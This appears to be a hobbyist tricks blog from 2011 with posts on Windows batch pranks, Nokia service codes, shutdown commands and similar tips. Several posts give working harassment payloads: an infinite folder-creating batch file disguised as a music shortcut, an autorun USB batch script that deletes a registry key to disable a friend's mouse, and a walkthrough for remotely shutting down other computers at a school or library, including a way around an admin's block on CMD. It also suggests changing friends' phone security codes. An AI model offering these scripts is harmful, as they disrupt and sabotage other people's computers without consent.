January 26, 2011


Its just a trick to save youtube video from browser cache files..

1.Goto youtube website...
2.Click the video which you want to download...
3.Then play the song....
4.After that goto cache folder

For chrome,
C:\Users\Administrator(Select your user account)\\AppData\Local\Google\Chrome\User Data\Default\Cache
Then right click->sort by->size
(For other browser this location may vary ,just do googling...

5.The files which starts with "f_" is your video file(ex: f_000f11)...
6.Then rename those files with extension .flv(ex: f_000f11.flv)
7.Double click that file to see the video.(flv extension is playable on VLC media player and like them)

For any doubts or if  you dont know about your  browser cache file location feel free to give a comments..........

January 23, 2011

Make over 1,000 folders in few seconds

Here I will teach you simple prank that will make an unlimmited amount of folders in any place you want.

Step 1
Open notepad and type :
@echo off
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Step 2
Save it as 1000folders.bat

After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it
Step 3
Right click on icon and click Create Shortcut

Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon

tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

January 21, 2011


gps phone tracking on Google Maps

Want to trace your mobile phone without any cost...

1.All you need is a Phone or PDA with built in GPS, or with Bluetooth GPS receiver.

2.Goto buddyway website

3.Register your mobile and download the applicaction to your mobile phone

4.By this you can.....

  • Track & save your trips
  • Share them with friends
  • View your trips in 3D in Google Earth
  • Show friends your location

5.Its also used to find your mobiles when the mobile is stolen by others.

January 20, 2011

Disable Your Friend’s Mouse Whenever USB Disk Is Inserted

In this short time pass tutorial, I am going to show you how to disable your friend’s mouse whenever your USB drive is inserted.
To get this feature working, you must make sure that your friend has not disabled autorun for removable media. However you may get this to work by creating a fake icon for the batch program.
First we’ll create a batch file and then we’ll be creating autorun.inf file. Then we’ll be pasting it in the root of USB drive. Now whenever the USB drive is inserted, system will look for autorun.inf. Autorun.inf will execute that batch file disabling the mouse.
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Copy the above code in notepad and save it as “filename.bat”
The above code will disable the mouse by deleteing the registry key of Mouclass and again adds data = 0×00000004 to the valuename = “Start”
Note: The above image is only demonstrates where the action will be taken by the above batch script. It has to do nothing with the procedure of this tutorial.
Action=Mouse Disable
The above code goes for autorun.inf. Open notepad, copy and paste the above code in it and save it as “autorun.inf”.
Now copy both of the file in your or your friend’s USB drive. Then let it do the magic.
To re-enable the mouse you’ll just have to change the value 0×00000004 to 0×00000001. To do so, simply create another batch file with following script:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
Hope this tutorial was fun trying to.

January 17, 2011

Create A Huge File - Fun Trick


You can create a file of any size using nothing more than what's supplied with Windows.
Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240.


1.Now open a command prompt window.

2.In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, XP or higher enter CMD instead. Enter the command DEBUG BIGFILE.DAT(here bigfile.dat is example,you can enter any filename with any extension) and ignore the File not found message.

3.Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example).

4.Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example). Enter

5.W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique.

January 16, 2011

Auto Shutdown Pc without using any external program( 3 methods )


Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!

Step 1:

Right click on your desktop and choose "New=>shortcuts".

Step 2:

In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:

Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.


Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in

Type Code: at 11:35 shutdown -s

to abort


shutdown -a

take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type

"at 20:30 shutdown -s" without quote


you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown

Type Code:
@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul

also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown Pc"

using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting Pc"

January 15, 2011

How to test antivirus-EICAR test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.


2. Rename the file from New Text Document.TXT to myfile.com

3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

January 14, 2011


Want to trace phon no,car,ip address,phone no, pin no,email and many more in India,

The first step is goto IndiaTrace. and then trace anything you want

(NOTE: This site does't trace exact location, It gives only approx. result. For exact location we need to buy a s/w . I post the inforamtion abt the s/w later)

January 13, 2011


First things first, Nokia is a worldwide Corporation which owns 36% of the market share. So no doubt alot of you own a Nokia mobile, whether it be CDMA or GSM.

CDMA : Is a phone which does not need a sim card to run, it just stores everything on the phone.
GSM : Is a phone which has a SIM card (like Vodafone)

There are several codes that you can use on Nokia's, i will run through these in this article.
(Stand-by mode is the main/home screen which displays your battery charge and signal)

(NOTE: The Service Programming Menu only works on CDMA phones)

1. Service Programming Menu - *3001#12345#

This menu is the mother of all Nokia codes, you can edit your phone like mad here, most of these menus your service provider probably doesn't want you to have the ability to do. So here we go.

On stand-by mode, type in *3001#12345# and wait a few seconds for it to load up. Once the screen comes up you will have several options, all with different functions. (NOTE: this menu differs on different phones.)

1. NAM 1
2. Change SPC
3. Security
4. Server addr.
5. SW version
6. Serial number
7. Programmed
8. Field test


1. NAM 1 (* means explained below)

This is the most useful menu your phone has, it allows you to edit the heck out of your phone! inside NAM 1 there are these different menus:

Own number*
Mobile ID number
A-key code
Alpha tag*
Service No.
CDMA settings
NAM status

Own number:
Self explanitory, but if you want a new number then this is where you want to go. Just enter this menu followed by the SPC (see Change SPC) then change your number. This DOES work, but the new phone number you want must not already be in use.

Alpha tag:
You know on the standby screen, there's the "Vodafone" or "Telecom" or "T-Mobile" that appears? well now you can get rid of that annoying tag. Change this to whatever you please, just to make your phone more personalised.

This menu is basically a menu which displays all the numbers that will divert to the emergency number of your area. For example, if you live in USA and your emergency number is 911, in this menu there will be "911","811", "991" and the obvious numbers that you may type in while trying to reach 911. It's smart not to mess with these, because you never know when you'll be in an emergency. There should be some free slots so why not add in a couple more numbers that you want to divert to your emergency?
Some people think "Wow! emergency number! that calls for free, so maybe if i put in my friends number then it will give me free calls to him/her!" WRONG. This menu can NOT give you free calls. If you were to put in your friends number, then whenever you called them you would end up calling the emergency line - as that's what you're diverted to! REMEMBER THIS!


2. Change SPC

The SPC is the Service Programming Code. This code is rather hard to come across, as the service providers try to hide it from the public so they can't access these places on their phones. But luckily enough if you live in New Zealand then here is the code :)

147359 - Is the default code that will let you into 'almost' anything
665*** - Is the 'master' code, that will let you into anything you like.

(The *** is the last 3 digits of your Nokia model, for example: If your Nokia was model number '8734', then your master code will be '665734'. The 665 is the default number for the Nokia company.)

So, this menu just means you can change the code. NOTE: Some mean stores when you buy the phone tend to access this menu and change it so that the owner can't access it :( that is not always the case though, so try it out!


3. Security

This menu just shows you the security code that is installed on your phone, couldn't be more bland.
FUN TRICK: why not have a look at your friend/work mates' phone and access this menu, you could then see their security code or change it just for fun :) But we're nice people and that's naughty, so we arn't going to do that are we..


4. Server addr.

This is the server address of your service provider. Nothing you can do here.


5. SW version

Once again, another menu with not alot of meaning. All you can do in here is check out when your phone was activated, and what version software it is running. This can also be accessed on GSM phones (see below)


6. Serial number

This is your serial number. DUH.
It would be a wise idea to jot this down somewhere safe, because this could be useful. If your phone was ever lost or stolen then you could contact your service provider and give them this code. This would let them shut the phone down so that your robber couldn't use your phone - or access anything on it for that matter.


7. Programmed

This is just a menu that you can only access once, which lets you type in when your phone was programmed.

Seem like the menus are getting lamer? Wait for the next one..


8. Field Test

This is an option which is quite cool really. Go into Field test and change "Disabled" to "Enabled". Then get out of the whole service programming menu.
Now, turn your phone off, and back on again.
Once it loads up go to your normal menu and scroll to the bottom. Notice you have just added a new menu to your phone? It is called Net Monitor.
Net Monitor speaks for itself, with this option you can monitor your network to a small extent.
Enter Net Monitor and it will prompt you with "Group/display:" enter in 3101 and press OK.
It should take you back to your standby screen, nothing will have changed. But wait a few seconds and then all these numbers will appear on your screen. What do they mean?

There is only one number you can really understand in this menu. This number is located as the third number down, it will say something like "-50" (the 50 can range anywhere from 10 to 99). This is how strong the signal is.

For example : If your phone displayed -10 here then it's telling you that your neighbour is a cell site and your signal is really really good.

If your phone displayed -90 then it's basically telling you that where you live or where you are at that certain time has really bad signal.

You will notice that as you get closer/further away to a cell site this number will grow or decrease.


That sums up the Service Programming Menu, and the extra things your service provider doesn't want you doing :}

There are many other codes that you can use on CDMA phones, just search around for them.

Extra Codes:

*#66767# - This code when spelt out is "NO-SMS", so shouldn't that mean no texting? well, yes. If you enter this code in on your phone then you will no longer have the ability to "Create Message" or "Reply". If you're really mean then enter it on your brother or sisters phone, that's sure to give you some laughs. You can bring them back again by re-entering the code.

*#639# - This brings you to the menu which just re-programs your phone faster. I wouldn't reccomend you doing this if you value your phone.

*#7780# - This takes you to a menu which says "Restore Factory Settings", i think you understand what will happen if you press yes :p

GSM Code:

This is the only GSM code i know from the top of my head, just search around for more as I'm sure they're out there.

*#0000# - This is probably the most useless code you can find, but anyway it just gives you information on when your phone was activated. If your phone was sent in for repair, then this date will have changed to the date when it was fixed.

January 10, 2011

How To Shutdown Other Computers At School Or College

How To ShutDown Other Computers, At School, Library Or Anywere Else where you and Them Share The Same Internet Connection.

>Info & How it Works
>What You Need

Ok so this is how it works, because you and the other computers are on the same Server connection, you get as much access to their pc as them with their username and password, but for this you do not need to exploit them, all we have to do is scan for their Domain/PC Name, this did work on other computers around the world but not no more.

What You Need:
Just a Computer Running Windows, & CMD, if your admin has blocked CMD from being ran, then please do the Following:

[Image: 93382191.jpg]
[Image: 32947486.jpg]

Then save the file as, CMD.bat on your desktop, and run it, and it should run like normal.

You also need, a connection to the internet, and make sure that others around you.

Okay So Once you have got CMD open, please do the following:

Type @Echo Off And press Enter:
[Image: 16730581.jpg]

Then CLS and press enter:
[Image: 57577579.jpg]

Then Type Color b and press enter:
[Image: 60439697.jpg]

This is not vital but makes the Windows Interface allot more easy whilst typing etc.

then if your not sure if there are others on your server type netstat and enter:

[Image: 81676483.jpg]

so as you can see, where myne says idex, that is the name of my pc, so if your in a school or library, you and everyone else should have a similar name, again this is not vital,

[Image: 98649461.jpg]

then what you want to do is clear the screen again by TYPE CLS.
then type shutdown -i and press enter again, a new dialog should appear.

[Image: 95097598.png]

you can then edit the setting of what you want to comp to do.

to add the comps you want to shut down, click add and manually enter the computer names, most comps will have the name printed on them, or if you know the ip this will also work.

[Image: 47179089.jpg]

If you dont know either, just click browse and search the directory and find the computer names, and then shutdown, etc or whatever you want to do with them..

[Image: 68093530.jpg]

Recover windows xp after virus attack

Hello guys , as we all know nowadays virus attacks are very common and we have to have lot of problems because of viruses like task manager does not opens,folder options missing, registry has been disabled by administrator,cannot find dll and so on. These are very common problems and can happen with any of us so we must know to fix these problems without formatting your windows XP. Most of the virus infects your basic programs i.e task manager,registry,group policy editor,boot up,folder properties etc. Today i will tell how to Fix windows Xp after virus attack in this article. So guys read on...

software,tool,hack tool,fix windows

There are several free tool in the market that can help you to fix your windows xp after virus attacks but i always come with complete package. Don't worry friends its also a free tool but using this you can recover almost everywindows services and functionality within few seconds and that's also without formatting. Why i am telling all this is because we must know how to recover along with how to hack and hacking...

The features of the tool that i have discussed above is called QUICK FIX.
Quick fix is really an outstanding tool. Its an complete solution of a to z windows XP problems. You can recover back from all types of virus attacks using this tool.

Below are some Important Features:
1. Enable Task Manager
2. Enable Registry
3. Enable Folder Options
4. Restore missing run dialog
5. Enable Command Prompt(cmd)
6. Stop My Documents to open at start up
7. Restore Device manager.
8. Fix Delay at start up.
9 Fix Recovery Console
and much more....

So Guys why are you waiting Download Quick Fix and Fix your windows problems wasily in a single click..


I hope you all have liked this... If you have any queries ask me.